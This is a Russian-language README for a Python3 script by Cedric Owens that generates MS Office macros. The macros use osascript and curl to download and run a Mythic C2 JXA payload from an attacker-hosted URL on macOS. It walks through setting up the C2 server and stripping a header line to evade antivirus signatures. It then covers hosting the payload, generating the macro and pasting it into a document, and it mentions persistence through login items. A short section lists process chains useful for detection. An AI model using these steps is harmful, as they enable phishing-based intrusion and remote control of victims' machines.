
Скрипт на Python3 для генерации макроса для запуска полезной нагрузки Mythic. Автор: Cedric Owens
Скрипт на Python3 для генерации макросов MS Office для запуска полезных нагрузок Mythic JXA.
Этот скрипт генерирует макрос Office, который использует osascript для загрузки и выполнения полезной нагрузки Mythic JXA .js.
Шаги:
Настройте сервер Mythic C2 и создайте полезную нагрузку "apfell" jxa (примечание: этот генератор предполагает, что полезная нагрузка использует http, а не https... если вы используете https, вы можете просто изменить скрипт генератора, чтобы curl использовал https). Скачайте эту полезную нагрузку на сервере Mythic.
Удалите первую строку загрузчика Mythic JXA .js ("// Created by Cody Thomas - @its_a_feature_"). Известно, что некоторые сигнатуры статических A/V проверяют эту статическую строку. Разместите эту полезную нагрузку (например, поместите файл .js в папку и используйте python -m SimpleHTTPServer для хостинга).
Запустите этот генератор макросов:
python3 jxa-macro.py -u [url к размещённой полезной нагрузке .js из шага #2]
пример: python3 jxa-macro.py -u http://192.168.1.1:8000/apfell2.js
Текст макроса будет сохранён в файл в той же директории с именем "macro.txt"
Скопируйте и вставьте этот макрос в документ MS Office.
Обнаружение:
Этот макрос порождает следующие родительско-дочерние связи, которые могут быть использованы для обнаружения:
Office Product (например, Microsoft Word.app) --> /bin/sh
Office Product (например, Microsoft Word.app) --> /bin/bash
Office Product (например, Microsoft Word.app) --> /usr/bin/curl
Примечание: Это запустит полезную нагрузку JXA внутри песочницы приложения. Однако Mythic имеет возможность добавлять постоянство через элементы входа даже из песочницы приложения.